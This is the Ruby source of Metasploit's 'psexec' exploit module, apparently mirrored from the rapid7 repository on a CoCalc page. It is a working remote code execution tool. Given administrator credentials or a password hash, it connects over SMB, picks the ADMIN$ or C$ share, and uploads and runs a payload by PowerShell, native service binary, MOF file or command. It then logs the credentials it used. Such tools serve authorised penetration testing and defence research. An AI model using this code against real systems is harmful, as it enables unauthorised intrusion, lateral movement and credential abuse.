Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/psexec.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# Windows XP systems that are not part of a domain default to treating all

7
# network logons as if they were Guest. This prevents SMB relay attacks from

8
# gaining administrative access to these systems. This setting can be found

9
# under:

10
#

11
#  Local Security Settings >

12
#   Local Policies >

13
#    Security Options >

14
#     Network Access: Sharing and security model for local accounts

15


16
class MetasploitModule < Msf::Exploit::Remote

17
  Rank = ManualRanking

18


19
  include Msf::Exploit::Remote::SMB::Client::Psexec

20
  include Msf::Exploit::Powershell

21
  include Msf::Exploit::EXE

22
  include Msf::Exploit::WbemExec

23
  include Msf::Auxiliary::Report

24
  include Msf::OptionalSession::SMB

25


26
  def initialize(info = {})

27
    super(

28
      update_info(

29
        info,

30
        'Name' => 'Microsoft Windows Authenticated User Code Execution',

31
        'Description' => %q{

32
          This module uses a valid administrator username and password (or

33
          password hash) to execute an arbitrary payload. This module is similar

34
          to the "psexec" utility provided by SysInternals. This module is now able

35
          to clean up after itself. The service created by this tool uses a randomly

36
          chosen name and description.

37
        },

38
        'Author' => [

39
          'hdm',

40
          'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module

41
          'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders

42
        ],

43
        'License' => MSF_LICENSE,

44
        'Privileged' => true,

45
        'DefaultOptions' => {

46
          'WfsDelay' => 10,

47
          'EXITFUNC' => 'thread'

48
        },

49
        'References' => [

50
          [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)

51
          [ 'OSVDB', '3106'],

52
          [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],

53
          [ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],

54
          [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],

55
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],

56
          [ 'ATT&CK', Mitre::Attack::Technique::T1569_002_SERVICE_EXECUTION ],

57
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],

58
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_001_POWERSHELL ],

59
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_003_WINDOWS_COMMAND_SHELL ],

60
          [ 'ATT&CK', Mitre::Attack::Technique::T1077_WINDOWS_ADMIN_SHARES ],

61
          [ 'ATT&CK', Mitre::Attack::Technique::T1078_VALID_ACCOUNTS ],

62
          [ 'ATT&CK', Mitre::Attack::Technique::T1105_INGRESS_TOOL_TRANSFER ]

63
        ],

64
        'Payload' => {

65
          'Space' => 3072,

66
          'DisableNops' => true

67
        },

68
        'Platform' => 'win',

69
        'Targets' => [

70
          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],

71
          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],

72
          [ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],

73
          [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],

74
          [ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]

75
        ],

76
        'DefaultTarget' => 0,

77
        # For the CVE, PsExec was first released around February or March 2001

78
        'DisclosureDate' => '1999-01-01',

79
        'Notes' => {

80
          'Reliability' => UNKNOWN_RELIABILITY,

81
          'Stability' => UNKNOWN_STABILITY,

82
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

83
        }

84
      )

85
    )

86


87
    register_options(

88
      [

89
        OptString.new('SMBSHARE', [false, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", ''], aliases: ['SHARE'])

90
      ]

91
    )

92


93
    register_advanced_options(

94
      [

95
        OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),

96
        OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),

97
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),

98
        OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])

99
      ]

100
    )

101
  end

102


103
  def native_upload_with_workaround(smbshare)

104
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"

105
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

106


107
    # Avoid implementing NTLMSSP on Windows XP

108
    # https://seclists.org/metasploit/2009/q1/6

109
    if smb_peer_os == "Windows 5.1"

110
      connect(versions: [1])

111
      smb_login

112
    end

113
    native_upload(smbshare, service_filename, service_encoder)

114
  end

115


116
  def validate_service_stub_encoder!

117
    service_encoder = datastore['SERVICE_STUB_ENCODER']

118
    return if service_encoder.nil? || service_encoder.empty?

119


120
    encoder = framework.encoders[service_encoder]

121
    if encoder.nil?

122
      raise Msf::OptionValidateError.new(

123
        {

124
          'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"

125
        }

126
      )

127
    end

128
  end

129


130
  def exploit

131
    validate_service_stub_encoder!

132


133
    # automatically select an SMB share unless one is explicitly specified

134
    if datastore['SMBSHARE'] && !datastore['SMBSHARE'].blank?

135
      smbshare = datastore['SMBSHARE']

136
    elsif target.name == 'Command'

137
      smbshare = 'C$'

138
    else

139
      smbshare = 'ADMIN$'

140
    end

141


142
    create_simple_smb_client!

143


144
    case target.name

145
    when 'Automatic'

146
      if powershell_installed?(smbshare, datastore['PSH_PATH'])

147
        print_status('Selecting PowerShell target')

148
        execute_powershell_payload

149
      else

150
        print_status('Selecting native target')

151
        native_upload_with_workaround(smbshare)

152
      end

153
    when 'PowerShell'

154
      execute_powershell_payload

155
    when 'Native upload'

156
      native_upload_with_workaround(smbshare)

157
    when 'MOF upload'

158
      mof_upload(smbshare)

159
    when 'Command'

160
      execute_command_payload(smbshare)

161
    end

162


163
    handler

164
    disconnect

165
  end

166


167
  def report_auth

168
    service_data = {

169
      address: ::Rex::Socket.getaddress(datastore['RHOST'], true),

170
      port: datastore['RPORT'],

171
      service_name: 'smb',

172
      protocol: 'tcp',

173
      workspace_id: myworkspace_id

174
    }

175


176
    credential_data = {

177
      origin_type: :service,

178
      module_fullname: self.fullname,

179
      private_data: datastore['SMBPass'],

180
      username: datastore['SMBUser'].downcase

181
    }

182


183
    if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'

184
      credential_data.merge!({

185
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,

186
        realm_value: datastore['SMBDomain']

187
      })

188
    end

189


190
    if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/

191
      credential_data.merge!({ :private_type => :ntlm_hash })

192
    else

193
      credential_data.merge!({ :private_type => :password })

194
    end

195


196
    credential_data.merge!(service_data)

197


198
    credential_core = create_credential(credential_data)

199


200
    login_data = {

201
      access_level: 'Admin',

202
      core: credential_core,

203
      last_attempted_at: DateTime.now,

204
      status: Metasploit::Model::Login::Status::SUCCESSFUL

205
    }

206


207
    login_data.merge!(service_data)

208
    create_credential_login(login_data)

209
  end

210


211
  def create_simple_smb_client!

212
    if session

213
      print_status("Using existing session #{session.sid}")

214
      self.simple = session.simple_client

215
    else

216
      print_status('Connecting to the server...')

217
      connect

218


219
      print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")

220
      smb_login

221


222
      if !simple.client.auth_user && !datastore['ALLOW_GUEST']

223
        print_line

224
        print_error(

225
          'FAILED! The remote host has only provided us with Guest privileges. ' \

226
            'Please make sure that the correct username and password have been provided. ' \

227
            'Windows XP systems that are not part of a domain will only provide Guest privileges ' \

228
            'to network logins by default.'

229
        )

230
        print_line

231
        disconnect

232
        return

233
      end

234


235
      unless datastore['SMBUser'].to_s.strip.empty?

236
        report_auth

237
      end

238


239
    end

240
  end

241
end

242


243